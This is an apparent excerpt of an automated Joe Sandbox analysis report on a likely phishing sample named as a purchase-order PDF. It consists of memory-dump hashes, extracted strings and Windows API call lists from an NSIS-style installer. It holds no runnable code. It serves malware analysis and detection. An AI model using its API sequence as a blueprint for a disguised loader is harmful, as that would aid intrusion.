                                                                                                            • Instruction Fuzzy Hash: EF818F30A00945CFCB18CF69C4A49AAB7B3BF88316B658169E825DF365E731EC45CF51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'^q$4'^q
                                                                                                            • API String ID: 0-2697143702
                                                                                                            • Opcode ID: 2fdc6a1d4e2ef8e24a4d1de36cfa0d63398d91bfe214fe818781664c92ac6841
                                                                                                            • Instruction ID: b41f299435f96a6a6ed1e445de2cbe8c15cdaad7cc311a964bfd09f008c67d0a
                                                                                                            • Opcode Fuzzy Hash: 2fdc6a1d4e2ef8e24a4d1de36cfa0d63398d91bfe214fe818781664c92ac6841
                                                                                                            • Instruction Fuzzy Hash: 1CF062353402186FDB081AAA9C5497B7ADBEBDC3A1B148429FD1DCB391DF72CC4647A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q
                                                                                                            • API String ID: 0-2625958711
                                                                                                            • Opcode ID: a608871ce892ce18ccd907f1328ec39271c9c0dd38e1547558d3196025d41f0c
                                                                                                            • Instruction ID: 235fff8977e7ee621c4e7037b6853307e0da2666660a954de0b84e146f46a2ac
                                                                                                            • Opcode Fuzzy Hash: a608871ce892ce18ccd907f1328ec39271c9c0dd38e1547558d3196025d41f0c
                                                                                                            • Instruction Fuzzy Hash: F5A1CD74E00249CFCF04DFA8D98499DBBB2FB49305B104629E619BB365EB34AD46CF84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q
                                                                                                            • API String ID: 0-74704288
                                                                                                            • Opcode ID: 3bbf67d76e614adad7d90964a8fcd42323995e2c8eaefd583186ac004c6fe583
                                                                                                            • Instruction ID: d14cbc0d4d5faf799c614d8d285c84511ac97e68f8c5aae84fecf2331a31d2af
                                                                                                            • Opcode Fuzzy Hash: 3bbf67d76e614adad7d90964a8fcd42323995e2c8eaefd583186ac004c6fe583
                                                                                                            • Instruction Fuzzy Hash: 2641FE31B042048FCB149F78D854AAE7BF2AFC8711F24416AE91ADB7A1CF309C85CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 516624c0ccb9581020d46f97001db4791b1617e9a34d2a4ab0a66d3587274298
                                                                                                            • Instruction ID: 41fcb74457d1db5e8d39927413eec3b6c1765358d9119871d4a7514d5f283219
                                                                                                            • Opcode Fuzzy Hash: 516624c0ccb9581020d46f97001db4791b1617e9a34d2a4ab0a66d3587274298
                                                                                                            • Instruction Fuzzy Hash: 6B711434700205CFCB14DF68C895A6A7BF6EF49702B5944A9E826CB3B1DB74EC85CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24c381382291cd0a828dad1cc94f6749355bc63f5f234a24738f91fef092e72f
                                                                                                            • Instruction ID: 4b461b9f1664907eb483cafb6d1ab6b3093b9281570fb287e0ba801db2705d84
                                                                                                            • Opcode Fuzzy Hash: 24c381382291cd0a828dad1cc94f6749355bc63f5f234a24738f91fef092e72f
                                                                                                            • Instruction Fuzzy Hash: BA717F31608655CFC715CF28C8D896A7BB1FF46312B168499FC699F2A2C731EC89CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4652bc5c0fa1d0f66c4d7ec880251f4cc1cce7b4d219c93817e3f4242753a533
                                                                                                            • Instruction ID: 3f673dc1bb8b777d99423c99f4464a12b9cccc939b48fd34129029d93e42b7b6
                                                                                                            • Opcode Fuzzy Hash: 4652bc5c0fa1d0f66c4d7ec880251f4cc1cce7b4d219c93817e3f4242753a533
                                                                                                            • Instruction Fuzzy Hash: A051B074E01208DFCB08DFA9D58499DBBF6FF89305B208069E919BB324DB35A946CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 782af27440fb29b7e2c24fea09dba1a9a6b85920a872d87b20c45e212970eafa
                                                                                                            • Instruction ID: 4d2bdd27fafaa9b22b1cd471d42def9b187e6419c720780dc40e337414646cde
                                                                                                            • Opcode Fuzzy Hash: 782af27440fb29b7e2c24fea09dba1a9a6b85920a872d87b20c45e212970eafa
                                                                                                            • Instruction Fuzzy Hash: 17419E30601245CFDB01DF28C884BAA7BA6EF89305F148066ED28DF266DB74DD49CBA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 03df35c3d8914117c11cdb2fca4a5dd2b9d50c509e734d709f7fe35612de08a4
                                                                                                            • Instruction ID: b55443ef38f5cf4b8b1cb7406c41d77894edf920afe36e4a9627f44846c75492
                                                                                                            • Opcode Fuzzy Hash: 03df35c3d8914117c11cdb2fca4a5dd2b9d50c509e734d709f7fe35612de08a4
                                                                                                            • Instruction Fuzzy Hash: 5231E131604149EFCF05AF64D895AAE3BB2EF89305F108025FD299B255CB35CEA5DBA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3fdd8641132182f398600745289495d33649648ffb89e9a061ca8a7c18ef2be9
                                                                                                            • Instruction ID: e1188d87a33b5507389b6cc529e93a6e8bca806fc57565505d0b40e6648559d4
                                                                                                            • Opcode Fuzzy Hash: 3fdd8641132182f398600745289495d33649648ffb89e9a061ca8a7c18ef2be9
                                                                                                            • Instruction Fuzzy Hash: 65317EB490424ADFCB01CFA8C144AADBFF1EF0A311F1045AAD865AB371D7319A45DB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d41bfbc64803bfcba40aeabb8bfcf227cc26c125b055aa736ef834d2de8f574a
                                                                                                            • Instruction ID: eb00bf4a485947c7fe7c5cea8ae7565e01a4d1c8233fb507d9875273d4a9ebc2
                                                                                                            • Opcode Fuzzy Hash: d41bfbc64803bfcba40aeabb8bfcf227cc26c125b055aa736ef834d2de8f574a
                                                                                                            • Instruction Fuzzy Hash: 7B21D6313082008BDB151725E855A3E25D79FC575AF648439E816CF7D8EF36CC8A93C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1fbe67d209e39fcc5643c123bbbbff6af5220b492dada87b725884a989a56f1c
                                                                                                            • Instruction ID: 45e71aa587b634e987ba311cd8c5cbeb5fefbab6df8e6d23a2f2d87d73cc15ba
                                                                                                            • Opcode Fuzzy Hash: 1fbe67d209e39fcc5643c123bbbbff6af5220b492dada87b725884a989a56f1c
                                                                                                            • Instruction Fuzzy Hash: EF219075A00106AFCB25DF24C450AAE77A5EF99768B11C019DD5E9B240EB34EE0ACBD2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1cfea68901d4a05767638d58d205ec69a4e0fc49d82db77fd048f3ace246c4ed
                                                                                                            • Instruction ID: 90f5cacb957855be2d4e744f86953683266b4b52fc971baec45e5f774c6c0095
                                                                                                            • Opcode Fuzzy Hash: 1cfea68901d4a05767638d58d205ec69a4e0fc49d82db77fd048f3ace246c4ed
                                                                                                            • Instruction Fuzzy Hash: 2021FF31300911CFC7199B26D86852EB3A3FF857927154028E81ADF750CF70DC46CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2917973623.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_ad000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 867bdc104b9fdf13748c1dba1d958e5fe823317b2dade7d2fd060270355a4f7d
                                                                                                            • Instruction ID: e89f49bf16575e18074979d6e38091d05812a4e43552af7c0281eda408d09cc0
                                                                                                            • Opcode Fuzzy Hash: 867bdc104b9fdf13748c1dba1d958e5fe823317b2dade7d2fd060270355a4f7d
                                                                                                            • Instruction Fuzzy Hash: 68213471604200EFCB20DF94D9C0F2ABBA1EB85314F24C56ED94A4B656C33AD847CA62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1794f730a84937db674430517ed25080f79f722b30284501b2ea0cca2e540cf6
                                                                                                            • Instruction ID: 3a132f5ac43e3f73787785ece8065d49aabe4d7f453aa721f45141e55c080a05
                                                                                                            • Opcode Fuzzy Hash: 1794f730a84937db674430517ed25080f79f722b30284501b2ea0cca2e540cf6
                                                                                                            • Instruction Fuzzy Hash: B9219074E042489FCB06EFB9C4006AEBBB2EF8A305F0084AA9854AB255DB745A49CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 559c111d0912656b471d77b69c80574796edcc3ac0939266cabac560b9580e09
                                                                                                            • Instruction ID: a99bd4e7450d89e1f2b1951710d7f8f3830636c22e8b2e2ea732ec1d1ae55dd2
                                                                                                            • Opcode Fuzzy Hash: 559c111d0912656b471d77b69c80574796edcc3ac0939266cabac560b9580e09
                                                                                                            • Instruction Fuzzy Hash: BA211674D052498FCB02DFB9D8446EEBFF4EF0A300F0441AAD545BB261EB305A89CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d388f502f3f08e04c1e2afb8e3990b7d8334662bd30898f4272bd5109d6baf30
                                                                                                            • Instruction ID: bb133e04cef3738f09aa6ef00f0607a6a6113104a3e424aae44899d2c95030e4
                                                                                                            • Opcode Fuzzy Hash: d388f502f3f08e04c1e2afb8e3990b7d8334662bd30898f4272bd5109d6baf30
                                                                                                            • Instruction Fuzzy Hash: AD215C70E01249DFCB05DFA5D550AEDBFB6AF48306F248069E825F6290DB30D985DB60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d43cb1b0efd39b1ca4d3fed7e64898992b4e659f85adc90508d0383aa5ac535b
                                                                                                            • Instruction ID: 2110addc4b25a465953103fd108dc49f58297bd836f57ca9d1957223ecd38e52
                                                                                                            • Opcode Fuzzy Hash: d43cb1b0efd39b1ca4d3fed7e64898992b4e659f85adc90508d0383aa5ac535b
                                                                                                            • Instruction Fuzzy Hash: FD010836B082014FDB559F35489862F7BE6BF8971930444BDD90ACB215FF60C8498752
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2917973623.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_ad000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aeeb28edeb7a7844692f5c9e5b1c86b761d25cb2a560f87f4e21d5c9dbefd6d7
                                                                                                            • Instruction ID: bad8b34923b5fca9ae4a1ea839c91f39fe9a3551cd3301db509fc3a9b6a90358
                                                                                                            • Opcode Fuzzy Hash: aeeb28edeb7a7844692f5c9e5b1c86b761d25cb2a560f87f4e21d5c9dbefd6d7
                                                                                                            • Instruction Fuzzy Hash: 6111DD75504280DFCB11CF54D5C4B15FFB2FB85314F28C6AAD84A4BA56C33AD84ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f39a6bfca563e877d05bbfffad7af47a2162f6129e13997e4aea51325d70dffe
                                                                                                            • Instruction ID: b587b941de301d41ee19567879a6de0501a4792a4c1f200ba58f30799095da5b
                                                                                                            • Opcode Fuzzy Hash: f39a6bfca563e877d05bbfffad7af47a2162f6129e13997e4aea51325d70dffe
                                                                                                            • Instruction Fuzzy Hash: CB016832708144AFCB028E649C21AEF3FB6DFC9340B28802AF914CB281CB758D469B90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3985b474287706d1c232e86c31354527048bc8d1983c05158f1fd6a8fc60f77a
                                                                                                            • Instruction ID: dd25587d42db07927f961f65135bcacd259d8e4b973cb97eb7fa540223b86ad3
                                                                                                            • Opcode Fuzzy Hash: 3985b474287706d1c232e86c31354527048bc8d1983c05158f1fd6a8fc60f77a
                                                                                                            • Instruction Fuzzy Hash: 4901D6367043119FD714AB79884862F76EBBFC86253148879D80DDB224FF70CC454791
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24ef316edcf3d76abab5a900adef781d13664f02759a639a26379e8ef2fb2caa
                                                                                                            • Instruction ID: 463673f95d5ae046d6650643df73b83cb7febb704f2ce1e3704a352bfcfb34f6
                                                                                                            • Opcode Fuzzy Hash: 24ef316edcf3d76abab5a900adef781d13664f02759a639a26379e8ef2fb2caa
                                                                                                            • Instruction Fuzzy Hash: 2E01D130D00288DFDB04CFA5D8086E9BBB2FB8E301F045038EA1077260CB365A96CF64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 94c904826f39aa19b11ec11d6d38f6701def8d5622c4d19f0b9b2b0ae0a0833c
                                                                                                            • Instruction ID: e971381678ccea75d1811f7e686bac84ed6d73c54f961c0c52f1d6d1e3b2f1ad
                                                                                                            • Opcode Fuzzy Hash: 94c904826f39aa19b11ec11d6d38f6701def8d5622c4d19f0b9b2b0ae0a0833c
                                                                                                            • Instruction Fuzzy Hash: D1E0D8366083069F97168B70D550857BFA29FC6316716486FE458C7570D720CC298751
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: da26fe4089632b3e9f6d295d91480fecf41630c171295e554bbfa4c4d2d2e4fb
                                                                                                            • Instruction ID: 89714eeed38384d8857deebd8d77b18283e5a9ca65cec7d55abd1e7a2d42e135
                                                                                                            • Opcode Fuzzy Hash: da26fe4089632b3e9f6d295d91480fecf41630c171295e554bbfa4c4d2d2e4fb
                                                                                                            • Instruction Fuzzy Hash: D1E01274D05208DFC744DFB9E54969DBBF6EB49301F6091BAD818A3350EB305E45DB40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c37edafb4d66f51732a10af9ef24833c264810173fe93ef543f6f91c657fe3a8
                                                                                                            • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                            • Opcode Fuzzy Hash: c37edafb4d66f51732a10af9ef24833c264810173fe93ef543f6f91c657fe3a8
                                                                                                            • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b7e0222b93f3e140a59d0de1751cd16169f560b40d4f7b905cbccf1fb75866c8
                                                                                                            • Instruction ID: 4ac426e9a9290908a797e782ae544fd3980ae87e5d2411a2f44ec638fc7184a7
                                                                                                            • Opcode Fuzzy Hash: b7e0222b93f3e140a59d0de1751cd16169f560b40d4f7b905cbccf1fb75866c8
                                                                                                            • Instruction Fuzzy Hash: C0D0A930801209DBC340DBA4E809AA9B778A703302F0010A8A808232108BB00E00C685
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 763204d517f282fa23197dd0d45a1e6e4790b3b6dae89bf061c7beb93e5fb504
                                                                                                            • Instruction ID: 175219d3bd827bdd69e10220c27c39674ddc7bd0a4f8d45a2505b78d5aea22a5
                                                                                                            • Opcode Fuzzy Hash: 763204d517f282fa23197dd0d45a1e6e4790b3b6dae89bf061c7beb93e5fb504
                                                                                                            • Instruction Fuzzy Hash: 7CC012304443084EC501F766DD45555B72FE780200B408520A1090767FEFB459DA8E90
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                            • GetVersion.KERNEL32 ref: 004032C8
                                                                                                            • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                            • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                            • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                            • CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A
                                                                                                              • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                              • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                            • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                            • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                            • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                            • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                            • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                              • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                            • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                            • ExitProcess.KERNEL32 ref: 00403618
                                                                                                            • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                            • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                            • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                            • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                            • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                            • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                            • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                            • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                            • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3586999533-3972089011
                                                                                                            • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                            • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                            • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                            • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404B53
